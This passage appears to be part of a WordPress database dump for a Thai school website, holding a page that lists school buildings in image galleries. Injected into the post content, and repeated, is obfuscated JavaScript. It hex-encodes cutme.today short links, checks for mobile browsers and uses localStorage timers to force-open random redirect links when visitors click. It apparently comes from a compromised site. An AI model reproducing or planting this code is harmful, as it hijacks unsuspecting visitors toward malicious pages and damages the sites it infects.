os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ข้อมูลสิ่งก่อสร้าง','','inherit','closed','closed','','609-revision-v1','','','2024-08-07 11:44:46','2024-08-07 04:44:46','',609,'http://pakhaeng.ssk.in.th/?p=637',0,'revision','',0),
(638,1,'2024-08-07 11:47:17','2024-08-07 04:47:17','<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/advancedgallery {\"uniqueID\":\"609_e70354-bb\",\"ids\":[620,617,618,619],\"type\":\"slider\",\"imagesDynamic\":[{\"id\":620,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=620\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119942_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119942_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119942_0.jpg\",\"width\":750,\"height\":422},{\"id\":617,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=617\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119960_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119960_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119960_0.jpg\",\"width\":750,\"height\":422},{\"id\":618,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=618\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119962_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119962_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119962_0.jpg\",\"width\":750,\"height\":422},{\"id\":619,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=619\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119963_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119963_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119963_0.jpg\",\"width\":750,\"height\":422}],\"kbVersion\":2} /-->\n\n<!-- wp:paragraph -->\n<p><strong>อาคารพิเศษ 1 ชั้น</strong></p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/advancedgallery {\"uniqueID\":\"609_7a2fca-b5\",\"ids\":[622,621],\"type\":\"slider\",\"imagesDynamic\":[{\"id\":622,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=622\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119948_0-1.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119948_0-1-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119948_0-1.jpg\",\"width\":750,\"height\":422},{\"id\":621,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=621\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119969.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119969-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119969.jpg\",\"width\":750,\"height\":422}],\"kbVersion\":2} /-->\n\n<!-- wp:paragraph -->\n<p><strong>อาคารเรียน สปช. 105/29 ปรับปรุง 2 ชั้น 4 ห้องเรียน (ชั้นล่างโล่ง</strong>)</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/advancedgallery {\"uniqueID\":\"609_72c110-54\",\"ids\":[610,613,612],\"type\":\"slider\",\"imagesDynamic\":[{\"id\":610,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=610\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119951.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119951-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119951.jpg\",\"width\":1024,\"height\":576},{\"id\":613,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=613\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119967_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119967_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119967_0.jpg\",\"width\":750,\"height\":422},{\"id\":612,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=612\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119966_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119966_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119966_0.jpg\",\"width\":750,\"height\":422}],\"kbVersion\":2} /-->\n\n<!-- wp:paragraph -->\n<p><strong>อาคารเรียน สปช. 104/26 ขนาด 3 ห้องเรียน</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"609_e7f603-c8\",\"ids\":[625,623,624],\"type\":\"slider\",\"imagesDynamic\":[{\"id\":625,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=625\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119950_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119950_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119950_0.jpg\",\"width\":750,\"height\":422},{\"id\":623,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=623\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119968.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119968-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119968.jpg\",\"width\":750,\"height\":422},{\"id\":624,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=624\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119970.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119970-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119970.jpg\",\"width\":750,\"height\":422}],\"kbVersion\":2} /-->\n\n<!-- wp:paragraph -->\n<p><strong>อาคารห้องสมุด</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"609_7b340e-23\",\"ids\":[633,630,631,632],\"type\":\"slider\",\"imagesDynamic\":[{\"id\":633,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=633\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119945_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119945_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119945_0.jpg\",\"width\":1024,\"height\":576},{\"id\":630,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=630\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119953_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119953_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119953_0.jpg\",\"width\":1024,\"height\":576},{\"id\":631,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=631\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119955_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119955_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119955_0.jpg\",\"width\":1024,\"height\":576},{\"id\":632,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=632\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119956_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119956_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119956_0.jpg\",\"width\":1024,\"height\":576}],\"kbVersion\":2} /-->\n\n<!-- wp:paragraph -->\n<p><strong>สปช.301/26 (บ้านพักครูเดี่ยว)</strong></p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/advancedgallery {\"uniqueID\":\"609_f12de5-af\",\"ids\":[616,614,615],\"type\":\"slider\",\"imagesDynamic\":[{\"id\":616,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=616\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119943_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119943_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119943_0.jpg\",\"width\":750,\"height\":422},{\"id\":614,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=614\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119957_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119957_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119957_0.jpg\",\"width\":1024,\"height\":576},{\"id\":615,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=615\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119959_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119959_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119959_0.jpg\",\"width\":1024,\"height\":576}],\"kbVersion\":2} /-->\n\n<!-- wp:paragraph -->\n<p><strong>อาคารเรียนอนุบาล</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"609_e50add-00\",\"ids\":[626,627],\"type\":\"slider\",\"imagesDynamic\":[{\"id\":626,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=626\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119971_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119971_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119971_0.jpg\",\"width\":750,\"height\":422},{\"id\":627,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=627\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119973_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119973_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119973_0.jpg\",\"width\":750,\"height\":422}],\"kbVersion\":2} /-->\n\n<!-- wp:paragraph -->\n<p><strong>ห้องน้ำ สปช.601/26</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"609_5f7dc9-b0\",\"ids\":[634,635,636],\"type\":\"slider\",\"imagesDynamic\":[{\"id\":634,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=634\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119974_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119974_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119974_0.jpg\",\"width\":750,\"height\":422},{\"id\":635,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=635\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119976_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119976_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119976_0.jpg\",\"width\":750,\"height\":422},{\"id\":636,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=636\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119977_0.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119977_0-1024x576.jpg\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/S__62119977_0.jpg\",\"width\":750,\"height\":422}],\"kbVersion\":2} /-->\n\n<!-- wp:paragraph -->\n<p><strong>สปช.601/26</strong></p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 